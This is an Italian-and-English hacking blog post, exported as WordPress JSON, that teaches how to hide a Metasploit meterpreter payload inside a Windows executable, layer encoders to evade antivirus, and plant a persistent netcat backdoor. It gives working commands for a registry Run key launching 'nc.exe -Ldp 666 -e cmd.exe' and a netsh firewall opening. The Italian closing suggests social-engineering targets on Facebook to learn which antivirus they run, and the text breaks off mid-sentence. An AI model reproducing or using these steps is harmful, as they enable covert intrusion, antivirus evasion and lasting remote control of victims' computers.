{"id":250,"date":"2013-01-09T19:54:14","date_gmt":"2013-01-09T18:54:14","guid":{"rendered":"http:\/\/under12oot.noblogs.org\/?p=250"},"modified":"2014-01-30T16:11:28","modified_gmt":"2014-01-30T15:11:28","slug":"generate-%ef%bb%bfundetectable-payload-and-%ef%bb%bfpersistent-netcat-backdoor","status":"publish","type":"post","link":"https:\/\/under12oot.noblogs.org\/?p=250","title":{"rendered":"Generate \ufeffUndetectable Payload and \ufeffPersistent Netcat Backdoor"},"content":{"rendered":"<p>Questo \u00e8 il secondo articolo, spiega come creare un payload quanto pi\u00f9 &#8220;undetectable&#8221; dagli antivirus e, una volta exploitato il sistema, creare una backdoor persistente con netcat. Oltre a questo, a fine articolo, ci saranno sviluppi sulla questione &#8220;sgamabile\/non sgamabile&#8221;, in <a title=\"metpay.sh\" href=\"http:\/\/pastebin.com\/5iSbYdy1\" target=\"_blank\">allegato<\/a> c&#8217;\u00e8 pure lo script che ho scritto per velocizzare le operazioni di creazione e di offuscamento&#8230; Come per l&#8217; articolo precedente l&#8217;inglese utilizzato \u00e8 molto semplice e le immagini sono esplicative, buona lettura!<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><!--\n@page { margin: 2cm }\nH3 { margin-left: 1.98cm; margin-right: 1.98cm; margin-top: 0.78cm; margin-bottom: 0.11cm; background: transparent; direction: ltr; color: #000000; background: transparent; line-height: 100%; text-align: left; orphans: 2; page-break-after: auto }\nH3.western { font-family: \"Arial\"; so-language: zxx }\nH3.cjk { font-family: \"DejaVu Sans\"; font-size: 12pt; font-weight: normal }\nH3.ctl { font-family: \"DejaVu Sans\"; font-size: 12pt; font-weight: normal }\nH1 { margin-left: 1.98cm; margin-right: 1.98cm; margin-top: 0.78cm; margin-bottom: 0.11cm; background: transparent; direction: ltr; color: #000000; background: transparent; line-height: 100%; text-align: left; orphans: 2; page-break-after: auto }\nH1.western { font-family: \"Arial\"; so-language: zxx }\nH1.cjk { font-family: \"DejaVu Sans\"; font-size: 12pt; font-weight: normal }\nH1.ctl { font-family: \"DejaVu Sans\"; font-size: 12pt; font-weight: normal }\nP { margin-bottom: 0.21cm }\nA:link { so-language: zxx }\n--><\/p>\n<h6 align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: large\"><b>In this article we show you how to built meterpreter payload inside an existent EXE, mask it at AV detenction and how to make a persistent netcat backdoor with BackBox 2.05<\/b><\/span><\/span><\/span><\/h6>\n<h6 align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: large\"><b>What you will learn&#8230;<\/b><\/span><\/span><\/span><\/h6>\n<ul>\n<li>\n<p lang=\"zxx\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">you will learn how to generate payload with msfpayload<\/span><\/span><\/span><\/p>\n<\/li>\n<li>\n<p lang=\"zxx\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">you will learn how to encode with msfencode and mask payload at AV detection<\/span><\/span><\/span><\/p>\n<\/li>\n<li>\n<p lang=\"zxx\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">you will learn how to upload netcat and execute it on start up<\/span><\/span><\/span><\/p>\n<\/li>\n<\/ul>\n<h3 align=\"LEFT\"><\/h3>\n<h6 align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: large\"><b>What you should know&#8230;<\/b><\/span><\/span><\/span><\/h6>\n<ul>\n<li>\n<p lang=\"zxx\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">you have to know (read you MUST know) how to move on Linux system, basic command, for example move trought the Directory, copy\/past\/remove file or dir<\/span><\/span><\/span><\/p>\n<\/li>\n<li>\n<p lang=\"zxx\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">you have to know (at least the base) how to work msfpayload, msfencode and msfconsole <\/span><\/span><\/span><\/p>\n<\/li>\n<\/ul>\n<h3 align=\"LEFT\"><\/h3>\n<p align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: x-large\"><b>Will start with choosing payload and generating it!<\/b><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">Selection of a payload is very simple, but we have to keep it in our mind that the AV signature is aware of most of known payloads generated by msfpayload. This is due to the a non considerable usage of web sites like virustotal.com that by analyzing our payloads they share the signatures with software house that develop anti virus. We will be performing our practical case to make sure that our signature being not indexed\/detected. To perform this task, I am going to use one of my script which allows to change and try different payload, and also different encode of setup msfconsole with the correct listener. This will allow me to perform my job faster. <\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">So lets run through together step by step.<\/span><\/span><\/span><\/p>\n<div id=\"attachment_246\" style=\"width: 310px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/1.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-246\" class=\"size-medium wp-image-246  \" alt=\"run script\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/1-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/1-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/1-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/1.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-246\" class=\"wp-caption-text\">run script<\/p><\/div>\n<p align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">Let\u2019s start with the meterpreter reverse_tcp (the most detectable one). Meterpreter, short for The Meta-Interpreter, is an advanced payload <\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">that is included in the Metasploit Framework. Its purpose is to provide complex and advanced features that would otherwise be tedious to implement purely in assembly. The way that it accomplishes this is by allowing developers to write their own extensions in the form of shared object (DLL) files that can be uploaded and injected into a running process on a target computer after exploitation has occurred. Meterpreter and all of the extensions that it loads are executed entirely from memory and never touch the disk, thus allowing them to execute under the radar of standard Anti-Virus detection. <\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">To build a payload we will need know our IP address (private one, remember that we are on the same network of the victim) and the port where we will put the listener. My script will do that automatically by askin to insert the IP address and PORT. So, we can set up the payload (also remember that different payload have different options) with the correct variable and also we can choose the EXE where we want to hide our payload!!! <\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">The command to perform and generate payload is simple: <\/span><\/span><\/span><\/p>\n<p lang=\"it-IT\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\"><i><span style=\"text-decoration: underline\">msfpayload $payload $IP $PORT<\/span><\/i><\/span><\/span><\/span><\/p>\n<div id=\"attachment_247\" style=\"width: 310px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/2.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-247\" class=\"size-medium wp-image-247 \" alt=\"scegliere l'eseguibile adatto\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/2-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/2-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/2-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/2.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-247\" class=\"wp-caption-text\">scegliere l&#8217;eseguibile adatto<\/p><\/div>\n<p><!--\n@page { margin: 2cm }\nP { margin-bottom: 0.21cm }\nA:link { so-language: zxx }\n--><\/p>\n<p align=\"LEFT\">\u00a0<span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">To this end I&#8217;ve selected msnsgs.exe (messenger), we might have some exe in our path. So, choose payload, generate it, choose an existent EXE, hide the payload inside the selected EXE, and encode all in order to mask against AV detection. This part is not simple! <\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">The current generation of all AVs detects payload generated with msfpayload. Performing our practical case for this article I\u2019ve run test with Avast and AVG anti viruses. Avast has detected all of my payloads, but with AVG, after several attempts I&#8217;ve found the way to escalate the detection. <\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">As you can see on image, the best thing to do is piping different encodes for \u201cx\u201d time&#8230; At this step we have to work hard! Try many and many times. This is the most hard part of our achievement and it requires lots of time. We have to find out the way to escape of AV detection for our signature. <\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">Honestly speaking, it doesn&#8217;t really exist an exact science but it does exist a sequence of step to follow\/perform and the only way to get success is knowing how to play around all this technique\/sequence of instructions. The technique mentioned consist to knowing how to play around the encodes and their options. My personal suggestion is making a few more iteration around encodes (getting more familiar wiith and chaining them) and with a good information gathering action performed we can hopefully discover which AVs is running on target system. In this way we can build an obfuscated payload for a specific AV. We can&#8217;t built anymore stealth executable binaries which was possible until a few times ago. So, being patient in this case will play a fundamental role if we would like to use msfpayload because, I&#8217;d like to remind you, if we don&#8217;t want to being detected and blocked by AV we have no other choice but writing our own backdoor.<\/span><\/span><\/span><\/p>\n<p><!--\n@page { margin: 2cm }\nP { margin-bottom: 0.21cm }\nA:link { so-language: zxx }\n--><\/p>\n<p align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">So, let go ahead by performing the following action to encode the payload inside an EXE file:<\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\"><span style=\"text-decoration: underline\">msfencode -e $encode -c $ManyTimeEnc -t $type -x $exe -o $output <\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">Which is in our case:<\/span><\/span><\/span><\/p>\n<p lang=\"it-IT\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\"><i><span style=\"text-decoration: underline\">msfpayload $payload $IP $PORT | msfencode -e $encode -c $ManyTimeEnc -t $type -x $exe -o $output1 | msfencode -e $encode -c $ManyTimeEnc -t $type -x $output1 -o $output2 | msfencode -e $encode -c $ManyTimeEnc -t $type -x $output2 -o $output3 <\/span><\/i><\/span><\/span><\/span><\/p>\n<div id=\"attachment_248\" style=\"width: 310px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/3.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-248\" class=\"size-medium wp-image-248 \" alt=\"set up ip address\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/3-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/3-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/3-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/3.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-248\" class=\"wp-caption-text\">set up ip address<\/p><\/div>\n<p><!--\n@page { margin: 2cm }\nP { margin-bottom: 0.21cm }\nA:link { so-language: zxx }\n--><\/p>\n<p align=\"LEFT\">\u00a0<span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">As mentioned above, you can try several time with different encodersand with different option&#8230; This step is the hard one but nothing is impossible to achieve our goal here and bypass AV detection!!!<\/span><\/span><\/span><\/p>\n<div id=\"attachment_249\" style=\"width: 310px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/4.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-249\" class=\"size-medium wp-image-249 \" alt=\"minaccia rilevata\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/4-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/4-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/4-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/4.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-249\" class=\"wp-caption-text\">minaccia rilevata<\/p><\/div>\n<p lang=\"zxx\" align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">&#8230;the way to bypass AV detection!!!<\/span><\/span><\/span><\/p>\n<div id=\"attachment_251\" style=\"width: 310px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/5.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-251\" class=\"size-medium wp-image-251 \" alt=\"upload evil exe\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/5-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/5-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/5-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/5.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-251\" class=\"wp-caption-text\">upload evil exe<\/p><\/div>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<div id=\"attachment_252\" style=\"width: 310px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/6.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-252\" class=\"size-medium wp-image-252 \" alt=\"undetected\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/6-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/6-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/6-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/6.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-252\" class=\"wp-caption-text\">undetected<\/p><\/div>\n<p align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">Msfconsole has been setup and started by our automated script, the infected exe has been uploaded via shared folder, none of threat has been found so let\u2019s go into meterpreter. The meterpreter offer us a suite of command and useful tools in order to proceed and have success in what we are doing here. The first thing to do is for sure is migrating the process into another one, this is necessary in case of our executable binary being blocked by terminating the meterpreter session. The migration is usually being done into an explorer.exe which is the application manager of windows, an essential process of system for its functioning. <\/span><\/span><\/span><\/p>\n<p>&nbsp;<\/p>\n<div id=\"attachment_253\" style=\"width: 310px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/7.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-253\" class=\"size-medium wp-image-253 \" alt=\"meterpreter\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/7-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/7-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/7-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/7.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-253\" class=\"wp-caption-text\">meterpreter<\/p><\/div>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<div id=\"attachment_255\" style=\"width: 310px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/9.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-255\" class=\"size-medium wp-image-255 \" alt=\"lista processi\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/9-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/9-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/9-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/9.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-255\" class=\"wp-caption-text\">lista processi<\/p><\/div>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<div id=\"attachment_256\" style=\"width: 310px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/10.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-256\" class=\"size-medium wp-image-256 \" alt=\"migrare il processo\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/10-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/10-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/10-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/10.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-256\" class=\"wp-caption-text\">migrare il processo<\/p><\/div>\n<p><!--\n@page { margin: 2cm }\nP { margin-bottom: 0.21cm }\nA:link { so-language: zxx }\n--><\/p>\n<p align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">Now lets migrate the process into explorer.exe with the following command: <\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\"><span style=\"text-decoration: underline\">migrate $id<\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\">\u00a0<span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">Above you can see different screenshots of the same process&#8230;<\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/12.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-258\" alt=\"12\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/12-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/12-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/12-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/12.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p align=\"LEFT\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/13.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-259\" alt=\"13\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/13-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/13-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/13-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/13.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><!--\n@page { margin: 2cm }\nP { margin-bottom: 0.21cm }\nA:link { so-language: zxx }\n--><\/p>\n<p align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">Now lets proceed with upload and setup of netcat. In order to achieve this step we will need the tool nc.exe! <\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">And the following step to set up nc.exe in order to make it start automatically during the next reboot! To do this I\u2019ve selected the port 666 (just to be a bitevil<i> \ud83d\ude09<\/i> ). This step include also the modification of windows register and the firewall. <\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\"><span style=\"font-family: Arial\"><i><span style=\"text-decoration: underline\">upload netcat.exe<\/span><\/i><\/span><\/span><\/span><\/span><\/p>\n<p><!--\n@page { margin: 2cm }\nP { margin-bottom: 0.21cm }\nA:link { so-language: zxx }\n--><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"text-decoration: underline\">meterpreter &gt; upload \/pentest\/windows-binaries\/tools\/nc.exe C:<\/span><\/span><\/span><a href=\"\/\/windows\/\/system32\">\\\\windows\\\\system32<\/a><\/p>\n<p align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">This adds the nc.exe to the register to start at boot To do this we will modify the register key: <span style=\"color: #c5000b\">&#8216;<\/span><span style=\"color: #000000\">HKLM\\software\\microsoft\\windows\\currentversion\\run&#8217; in order to run netcat in every reboot of the system on port 666<\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\"><span style=\"color: #000000\"><span style=\"text-decoration: underline\">meterpreter &gt; reg enumkey -k HKLM\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run<\/span><\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Courier New\"><span style=\"font-size: small\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"text-decoration: underline\">meterpreter &gt; reg setval -k HKLM\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run -v nc -d &#8216;C:\\windows\\system32\\nc.exe -Ldp 666 -e cmd.exe<\/span><\/span><\/span><span style=\"color: #13c16a\"><span style=\"font-family: Arial\"><i>&#8216;<\/i><\/span><\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\"><span style=\"text-decoration: underline\">meterpreter &gt; reg queryval -k HKLM\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\Run -v nc<\/span><\/span><\/span><\/span><\/p>\n<p><!--\n@page { margin: 2cm }\nP { margin-bottom: 0.21cm }\nA:link { so-language: zxx }\n--><\/p>\n<p align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial,sans-serif\"><span style=\"font-size: small\">So, we will proceed to alter the system in order to allow for remote connections through firewall. We just open a normal CMD of windows and run the command &#8220;netsh&#8221; to apply for the above changes as follow:<\/span><\/span><\/span><\/p>\n<p><!--\n@page { margin: 2cm }\nP { margin-bottom: 0.21cm }\nA:link { so-language: zxx }\n--><\/p>\n<p align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\"><span style=\"text-decoration: underline\">meterpreter &gt; execute -f cmd -i<\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #000000\"><span style=\"text-decoration: underline\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">D:\\&gt; netsh firewall show opmode<\/span><\/span><\/span><\/span><\/p>\n<p align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Courier New\"><span style=\"font-size: small\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"text-decoration: underline\">This need to open firewall D:\\&gt; <\/span><\/span><\/span><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"text-decoration: underline\">netsh firewall add portopening TCP 666 &#8220;Service Firewall&#8221; ENABLE ALL<\/span><\/span><\/span><\/span><\/span><\/span><\/p>\n<div id=\"attachment_260\" style=\"width: 310px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/14.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-260\" class=\"size-medium wp-image-260 \" alt=\"aprire il firewall di winzoz\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/14-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/14-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/14-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/14.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-260\" class=\"wp-caption-text\">aprire il firewall di winzoz<\/p><\/div>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><!--\n@page { margin: 2cm }\nP { margin-bottom: 0.21cm }\nA:link { so-language: zxx }\n--><\/p>\n<p align=\"LEFT\"><span style=\"color: #000000\"><span style=\"font-family: Arial\"><span style=\"font-size: small\">Now lets reboot the VirtualMachine and lets connect with netcat&#8230;..<\/span><\/span><\/span><\/p>\n<div id=\"attachment_261\" style=\"width: 310px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/15.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-261\" class=\"size-medium wp-image-261 \" alt=\"reboot e connessione con netcat\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/15-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/15-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/15-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/15.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-261\" class=\"wp-caption-text\">reboot e connessione con netcat<\/p><\/div>\n<div id=\"attachment_262\" style=\"width: 310px\" class=\"wp-caption alignleft\"><a href=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/16.png\" target=\"_blank\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-262\" class=\"size-medium wp-image-262 \" alt=\"connesso ;)\" src=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/16-300x168.png\" width=\"300\" height=\"168\" srcset=\"https:\/\/under12oot.noblogs.org\/files\/2013\/01\/16-300x168.png 300w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/16-1024x575.png 1024w, https:\/\/under12oot.noblogs.org\/files\/2013\/01\/16.png 1366w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><p id=\"caption-attachment-262\" class=\"wp-caption-text\">connesso \ud83d\ude09<\/p><\/div>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Qui l&#8217;articolo finiva, ma come potete capire da soli, creare un eseguibile che sia realmente non rilevabile \u00e8 un impresa assai ardua, potremmo dire che \u00e8 quasi una questione di fortuna&#8230; la qual cosa ovviamente non ci aggrada, cosa possiamo allora? b\u00e8 ci sono un paio di cose che sicuramente possono aiutarci:<\/p>\n<ul>\n<li>una buona, se non ottima, sessione di information gathering e social engineering, con l&#8217; ausilio di facebook, per esempio, una volta contattato il nostro obiettivo possiamo cercare di farci dire che AV gira sulla propria macchina. Cos\u00ec facendo possiamo concentrarci a rendere sicuro l&#8217;eseguibile verso un solo AV, e non brancoleremo nel buio, risparmiando un sacco di tempo e fatica!<\/li>\n<li>possiamo creare e scrivere noi il malware, forse \u00e8 